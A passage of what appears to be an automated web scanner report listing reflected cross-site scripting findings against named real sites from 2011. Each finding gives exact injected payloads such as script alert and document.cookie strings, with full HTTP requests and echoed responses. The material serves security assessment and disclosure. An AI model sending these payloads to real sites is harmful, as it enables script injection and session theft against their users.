Referer: http://www.smartphonetoday.com/?10d85--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E11ae5b1cf82=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_USR=ANkSyp+gB0LFkFNngJhTlV8AADqvAAA66wUAAAEuOVsIpQA-

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Content-Type: application/x-javascript
Content-Length: 63
Date: Fri, 18 Feb 2011 15:21:02 GMT
Age: 0
Connection: keep-alive

try{$iTXT.js.callback139e99;alert(1)//26306191dc7();}catch(e){}

3.65. http://smartphonetoday.us.intellitxt.com/v4/init [jscallback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://smartphonetoday.us.intellitxt.com
Path:   /v4/init

Issue detail

The value of the jscallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 3e2a3%3balert(1)//6d082f7d91e was submitted in the jscallback parameter. This input was echoed as 3e2a3;alert(1)//6d082f7d91e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /v4/init?ts=1298042459718&pagecl=61592&fv=10&muid=&refurl=http%3A%2F%2Fwww.smartphonetoday.com%2F%3F10d85--%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E11ae5b1cf82%3D1&ipid=26011&jscallback=$iTXT.js.callback03e2a3%3balert(1)//6d082f7d91e HTTP/1.1
Host: smartphonetoday.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.smartphonetoday.com/?10d85--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E11ae5b1cf82=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_USR=ANkSyp+gB0LFkFNngJhTlV8AADqvAAA66wUAAAEuOVsIpQA-

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Content-Type: application/x-javascript
Vary: Accept-Encoding
Date: Fri, 18 Feb 2011 15:21:35 GMT
Age: 0
Connection: keep-alive
Content-Length: 19277

var undefined;if(null==$iTXT.glob.dbParams||undefined==$iTXT.glob.dbParams){$iTXT.glob.dbParams=new $iTXT.data.Param(undefined,undefined,undefined,'DATABASE');}$iTXT.glob.dbParams.set({"searchengine.h
...[SNIP]...
arams.set('minimagew',180);$iTXT.data.Context.params.set('minimageh',200);$iTXT.data.Context.params.set('intattrs','alt,title,href,src,name');$iTXT.data.Dom.detectSearchEngines();try{$iTXT.js.callback03e2a3;alert(1)//6d082f7d91e({"requiresContextualization":0,"requiresAdverts":1});}catch(e){}

3.66. http://smartphonetoday.us.intellitxt.com/v4/init [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://smartphonetoday.us.intellitxt.com
Path:   /v4/init

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cff44"-alert(1)-"2e3ab260276 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /v4/init?ts=1298042459718&pagecl=61592&fv=10&muid=&refurl=http%3A%2F%2Fwww.smartphonetoday.com%2F%3F10d85--%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E11ae5b1cf82%3D1&ipid=26011&jscallback=$iTXT.js.callback0&cff44"-alert(1)-"2e3ab260276=1 HTTP/1.1
Host: smartphonetoday.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.smartphonetoday.com/?10d85--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E11ae5b1cf82=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_USR=ANkSyp+gB0LFkFNngJhTlV8AADqvAAA66wUAAAEuOVsIpQA-

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Content-Type: application/x-javascript
Vary: Accept-Encoding
Date: Fri, 18 Feb 2011 15:21:40 GMT
Age: 0
Connection: keep-alive
Content-Length: 19258

var undefined;if(null==$iTXT.glob.dbParams||undefined==$iTXT.glob.dbParams){$iTXT.glob.dbParams=new $iTXT.data.Param(undefined,undefined,undefined,'DATABASE');}$iTXT.glob.dbParams.set({"searchengine.h
...[SNIP]...
"POSTCODE":"75207","user-agent":"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13","REGIONNAME":"Texas","muid":"","city":"Dallas","cff44"-alert(1)-"2e3ab260276":"1","jscallback":"$iTXT.js.callback0","reg":"tx","refurl":"http://www.smartphonetoday.com/?10d85--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E11ae5b1cf82\u003d1","rcc":"us","cc":"us"},null,60);
...[SNIP]...

3.67. http://vbforums.us.intellitxt.com/al.asp [jscallback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://vbforums.us.intellitxt.com
Path:   /al.asp

Issue detail

The value of the jscallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 5943c%3balert(1)//88cafba6704 was submitted in the jscallback parameter. This input was echoed as 5943c;alert(1)//88cafba6704 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /al.asp?ts=20110218151842&adid=0%2C0%2C0%2C0%2C168581&cc=us&di=29875403%2C28599592%2C28599656%2C30018999%2C30085818&hk=1&ipid=26443&mh=1fc3c70af67df0d9d8cc9dfe06cabe3f&pid=2%2C2%2C2%2C2%2C2&pvm=db1942607d3ea8ded55849e322184dee&pvu=4E7EFD9063FE451AA0D4C6C6D85815AE&rcc=us&so=0&syid=0%2C0%2C0%2C0%2C0&uf=0%2C0%2C0%2C0%2C0&ur=0%2C0%2C0%2C0%2C0&kp=544%2C819%3B372%2C881%3B265%2C1144%3B102%2C1627%3B184%2C1701%3B&prf=ll%3A1190%7Cintl%3A2438%7Cpreprochrome%3A5%7Cgetconchrome%3A264%7Ccontint%3A9543%7Ccontl%3A12253%7Cadvint%3A1287%7Cadvl%3A13540%7Ctl%3A13642&jscallback=$iTXT.js.callback105943c%3balert(1)//88cafba6704 HTTP/1.1
Host: vbforums.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.vbforums.com/?86b8b--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E5c1edad1dc6=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_USR=ANkSyp+gB0LFkFNngJhTlV8AADqvAAA66wQAAAEuOVhn9AA-

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Set-Cookie: VM_USR=ANkSyp+gB0LFkFNngJhTlV8AADqvAAA66wQAAAEuOVhn9AA-; Domain=.intellitxt.com; Expires=Tue, 19-Apr-2011 15:18:26 GMT; Path=/
Content-Type: text/javascript
Content-Length: 66
Date: Fri, 18 Feb 2011 15:18:26 GMT
Age: 0
Connection: keep-alive

try{$iTXT.js.callback105943c;alert(1)//88cafba6704();}catch(e){}

3.68. http://vbforums.us.intellitxt.com/intellitxt/front.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://vbforums.us.intellitxt.com
Path:   /intellitxt/front.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d4ad8'-alert(1)-'ecc7883e0c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /intellitxt/front.asp?ipid=26443&d4ad8'-alert(1)-'ecc7883e0c=1 HTTP/1.1
Host: vbforums.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.vbforums.com/?86b8b--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E5c1edad1dc6=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_USR=ANkSyp+gB0LFkFNngJhTlV8AADqvAAA66wIAAAEuOM+rkQA-

Response

HTTP/1.1 200 OK
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Set-Cookie: VM_USR=ANkSyp+gB0LFkFNngJhTlV8AADqvAAA66wMAAAEuOVhsSAA-; Domain=.intellitxt.com; Expires=Tue, 19-Apr-2011 15:16:59 GMT; Path=/
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Set-Cookie: VM_USR=ANkSyp+gB0LFkFNngJhTlV8AADqvAAA66wMAAAEuOVhsSAA-; Domain=.intellitxt.com; Expires=Tue, 19-Apr-2011 15:16:59 GMT; Path=/
Content-Type: application/x-javascript
Vary: Accept-Encoding
Date: Fri, 18 Feb 2011 15:16:59 GMT
Age: 0
Connection: keep-alive
Content-Length: 10597

document.itxtDisabled=1;
document.itxtDebugOn=false;
if(document.itxtDisabled){
document.itxtInProg=1;
if ('undefined'== typeof $iTXT){$iTXT={};};if (!$iTXT.cnst){$iTXT.cnst={};} if (!$iTXT.debug){$iT
...[SNIP]...
rc="http://b.scorecardresearch.com/b?c1=8&c2=6000002&c3=90000&c4=&c5=&c6=&c15=&cv=1.3&cj=1&rn=20110218151659";})();$iTXT.js.serverUrl='http://vbforums.us.intellitxt.com';$iTXT.js.pageQuery='ipid=26443&d4ad8'-alert(1)-'ecc7883e0c=1';$iTXT.js.umat=true;$iTXT.js.startTime=(new Date()).getTime();if (document.itxtIsReady) {document.itxtLoadLibraries();};
}

3.69. http://vbforums.us.intellitxt.com/v4/advert [jscallback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://vbforums.us.intellitxt.com
Path:   /v4/advert

Issue detail

The value of the jscallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 9cb15%3balert(1)//db24a5d0383 was submitted in the jscallback parameter. This input was echoed as 9cb15;alert(1)//db24a5d0383 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /v4/advert?ts=1298042320867&refurl=http%3A%2F%2Fwww.vbforums.com%2F%3F86b8b--%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E5c1edad1dc6%3D1&sid=1fc3c70af67df0d9d8cc9dfe06cabe3f&pvu=4E7EFD9063FE451AA0D4C6C6D85815AE&pvm=db1942607d3ea8ded55849e322184dee&ipid=26443&cc=us&rcc=us&reg=tx&dma=623&city=Dallas&dat=62%2C76%2C32%2C46%2C34%2C12%2C6%2C18%2C77%2C87%2C89%2C140&jscallback=$iTXT.js.callback99cb15%3balert(1)//db24a5d0383 HTTP/1.1
Host: vbforums.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.vbforums.com/?86b8b--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E5c1edad1dc6=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_USR=ANkSyp+gB0LFkFNngJhTlV8AADqvAAA66wQAAAEuOVhn9AA-

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Content-Type: application/x-javascript
Vary: Accept-Encoding
Date: Fri, 18 Feb 2011 15:18:23 GMT
Age: 0
Connection: keep-alive
Content-Length: 10217

(function(){var nh = new $iTXT.ui.Hook({value: "applications",uid: "A379E9596BF046EEAB0EA695CA98EC12",uidh: "cccd3cce584bdc87b30947aabdb3865c",advert: (function(){var ad = new $iTXT.data.Advert('$iTXT
...[SNIP]...
d;})()});return nh;})();(function(){$iTXT.tmpl.load('FreeForm');$iTXT.tmpl.load('ExpandableFlash');})();$iTXT.glob.track.rand=[];$iTXT.glob.track.guar=[];$iTXT.glob.track.hook=[];try{$iTXT.js.callback99cb15;alert(1)//db24a5d0383();}catch(e){}

3.70. http://vbforums.us.intellitxt.com/v4/context [jscallback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://vbforums.us.intellitxt.com
Path:   /v4/context

Issue detail

The value of the jscallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 696d5%3balert(1)//34ca25cba28 was submitted in the jscallback parameter. This input was echoed as 696d5;alert(1)//34ca25cba28 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /v4/context?ts=1298042311324&refurl=http%3A%2F%2Fwww.vbforums.com%2F%3F86b8b--%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E5c1edad1dc6%3D1&sid=1fc3c70af67df0d9d8cc9dfe06cabe3f&pvu=4E7EFD9063FE451AA0D4C6C6D85815AE&pvm=db1942607d3ea8ded55849e322184dee&ipid=26443&cc=us&rcc=us&reg=tx&dma=623&city=Dallas&dat=62%2C76%2C32%2C46%2C34%2C12%2C6%2C18%2C77%2C87%2C89%2C140&pagecl=60204&jsoncl=7046&ppc=-1&hn=47&chunkkey=26443:1fc3c70af67df0d9d8cc9dfe06cabe3f:D912CA9FA00742C5905367809853955F:&data=%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bp%3A1%2Cx%3A%5B%7Bt%3A%22std%22%2Cn%3A1%2Cc%3A%22Drop%20in%20here%20to%20discuss%20all%20editions%20and%20versions%20of%20Visual%20Basic%20.NET%20(2002%20or%20later)%20or%20anything%20to%20do%20with%20VB%20.NET%20programming.%22%7D%5D%7D%5D%7D%5D%7D%2C%7Bx%3A%5B%7Bx%3A%5B%7Bp%3A1%2Cx%3A%5B%7Bt%3A%22std%22%2Cn%3A2%2Cc%3A%22This%20forum%20is%20for%20all%20your%20Visual%20Basic%20(versions%203%2C%204%2C%205%2C%20%26%206)%20coding%20questions%20that%20do%20not%20fit%20into%20one%20of%20the%20more%20specific%20forums%20below.%22%7D%5D%7D%5D%7D%5D%7D%2C%7Bx%3A%5B%7Bx%3A%5B%7Bp%3A1%2Cx%3A%5B%7Bt%3A%22std%22%2Cn%3A3%2Cc%3A%22Post%20all%20your%20questions%20here%20regarding%20Microsoft%20Office%20Automation.%20This%20can%20include%20VSTO%2C%20VSTA%2C%20and%20VBA%20questions.%22%7D%5D%7D%5D%7D%5D%7D%2C%7Bx%3A%5B%7Bx%3A%5B%7Bp%3A1%2Cx%3A%5B%7Bt%3A%22std%22%2Cn%3A4%2Cc%3A%22This%20forum%20is%20the%20place%20to%20post%20all%20your%20questions%20about%20using%20the%20Internet%20within%20your%20applications.%20Topics%20include%3A%20writing%20components%20for%20ASP%20(classic)%2C%20VB%20Script%2C%20and%20more.%22%7D%5D%7D%5D%7D%5D%7D%2C%7Bx%3A%5B%7Bx%3A%5B%7Bp%3A1%2Cx%3A%5B%7Bt%3A%22std%22%2Cn%3A5%2Cc%3A%22Post%20your%20questions%20about%20developing%20applications%20to%20interact%20with%20databases%20here.%20Topics%20include%20Using%20the%20Data%20Control%2C%20D&chunk=0&total=8&jscallback=$iTXT.js.callback1696d5%3balert(1)//34ca25cba28 HTTP/1.1
Host: vbforums.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.vbforums.com/?86b8b--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E5c1edad1dc6=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_USR=ANkSyp+gB0LFkFNngJhTlV8AADqvAAA66wQAAAEuOVhn9AA-

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Content-Type: application/x-javascript
Content-Length: 63
Date: Fri, 18 Feb 2011 15:18:30 GMT
Age: 0
Connection: keep-alive

try{$iTXT.js.callback1696d5;alert(1)//34ca25cba28();}catch(e){}

3.71. http://vbforums.us.intellitxt.com/v4/init [jscallback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://vbforums.us.intellitxt.com
Path:   /v4/init

Issue detail

The value of the jscallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 233b5%3balert(1)//883b0a64c48 was submitted in the jscallback parameter. This input was echoed as 233b5;alert(1)//883b0a64c48 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /v4/init?ts=1298042273945&pagecl=60171&fv=10&muid=&refurl=http%3A%2F%2Fwww.vbforums.com%2F%3F86b8b--%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E5c1edad1dc6%3D1&ipid=26443&jscallback=$iTXT.js.callback0233b5%3balert(1)//883b0a64c48 HTTP/1.1
Host: vbforums.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.vbforums.com/?86b8b--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E5c1edad1dc6=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_USR="ANkSyp+gB0LFkFNngJhTlV8AADqvAAA66wMAAAEuOVg/6QA-"

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Content-Type: application/x-javascript
Vary: Accept-Encoding
Date: Fri, 18 Feb 2011 15:18:28 GMT
Age: 0
Connection: keep-alive
Content-Length: 16909

var undefined;if(null==$iTXT.glob.dbParams||undefined==$iTXT.glob.dbParams){$iTXT.glob.dbParams=new $iTXT.data.Param(undefined,undefined,undefined,'DATABASE');}$iTXT.glob.dbParams.set({"searchengine.h
...[SNIP]...
arams.set('minimagew',180);$iTXT.data.Context.params.set('minimageh',200);$iTXT.data.Context.params.set('intattrs','alt,title,href,src,name');$iTXT.data.Dom.detectSearchEngines();try{$iTXT.js.callback0233b5;alert(1)//883b0a64c48({"requiresContextualization":0,"requiresAdverts":1});}catch(e){}

3.72. http://vbforums.us.intellitxt.com/v4/init [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://vbforums.us.intellitxt.com
Path:   /v4/init

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload adb6b"-alert(1)-"6fb46acbb2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /v4/init?ts=1298042273945&pagecl=60171&fv=10&muid=&refurl=http%3A%2F%2Fwww.vbforums.com%2F%3F86b8b--%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E5c1edad1dc6%3D1&ipid=26443&jscallback=$iTXT.js.callback0&adb6b"-alert(1)-"6fb46acbb2=1 HTTP/1.1
Host: vbforums.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.vbforums.com/?86b8b--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E5c1edad1dc6=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_USR="ANkSyp+gB0LFkFNngJhTlV8AADqvAAA66wMAAAEuOVg/6QA-"

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Content-Type: application/x-javascript
Vary: Accept-Encoding
Date: Fri, 18 Feb 2011 15:18:33 GMT
Age: 0
Connection: keep-alive
Content-Length: 16889

var undefined;if(null==$iTXT.glob.dbParams||undefined==$iTXT.glob.dbParams){$iTXT.glob.dbParams=new $iTXT.data.Param(undefined,undefined,undefined,'DATABASE');}$iTXT.glob.dbParams.set({"searchengine.h
...[SNIP]...
(Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13","REGIONNAME":"Texas","muid":"","city":"Dallas","jscallback":"$iTXT.js.callback0","reg":"tx","adb6b"-alert(1)-"6fb46acbb2":"1","refurl":"http://www.vbforums.com/?86b8b--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E5c1edad1dc6\u003d1","rcc":"us","cc":"us"},null,60);var undefined;if(null==$iTXT.glob.params||undefined=
...[SNIP]...

3.73. http://virtacore.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://virtacore.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 66f9b</script><script>alert(1)</script>bbeb208fd95 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?66f9b</script><script>alert(1)</script>bbeb208fd95=1 HTTP/1.1
Host: virtacore.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 18 Feb 2011 03:22:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11130808;expires=Sun, 10-Feb-2041 03:22:08 GMT;path=/
Set-Cookie: CFTOKEN=43832625;expires=Sun, 10-Feb-2041 03:22:08 GMT;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Virtacore Home- Cloud H
...[SNIP]...
<!--
           _uacct='UA-19578445-1';redux.load({uid:'11130808-43832625',history:true, tid:2, tmpid:1, url:'index.cfm', sid:15, query:'66f9b</script><script>alert(1)</script>bbeb208fd95=1', name:'index',title:'Virtacore Home- Cloud Hosting | Cloud Servers | Managed Cloud Hosting | Managed Cloud Servers | Virtualization',"resource":[{"type":"CSS","title":"template1CSS","id":"template1
...[SNIP]...

3.74. http://virtacore.com/vcloud_express.cfm [rxtype parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://virtacore.com
Path:   /vcloud_express.cfm

Issue detail

The value of the rxtype request parameter is copied into the HTML document as plain text between tags. The payload dc41d<script>alert(1)</script>cc8d1806ffc was submitted in the rxtype parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /vcloud_express.cfm?rxtype=dc41d<script>alert(1)</script>cc8d1806ffc&ts=1297999477134-11130790-98617796 HTTP/1.1
Host: virtacore.com
Proxy-Connection: keep-alive
Referer: http://virtacore.com/
X-Requested-With: XMLHttpRequest
Accept: text/javascript, text/html, application/xml, text/xml, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=22208188.27686095.1297999341.1297999341.1297999341.1; __utmb=22208188; __utmc=22208188; __utmz=22208188.1297999341.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); CFID=11130852; CFTOKEN=57982461

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 18 Feb 2011 03:24:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


   {history:false, tid:1, sid:0, title:'Page Error',onload:function(){oModeless('error','<h1 class=title>We apologize, however there was an error with your request.</h1>/vcloud_express.cfm?rxtype=dc41d<script>alert(1)</script>cc8d1806ffc&ts=1297999477134-11130790-98617796 <style>
...[SNIP]...

3.75. http://www.internet.com/developer [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.internet.com
Path:   /developer

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 2d7d7<script>alert(1)</script>a487c4b6236 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

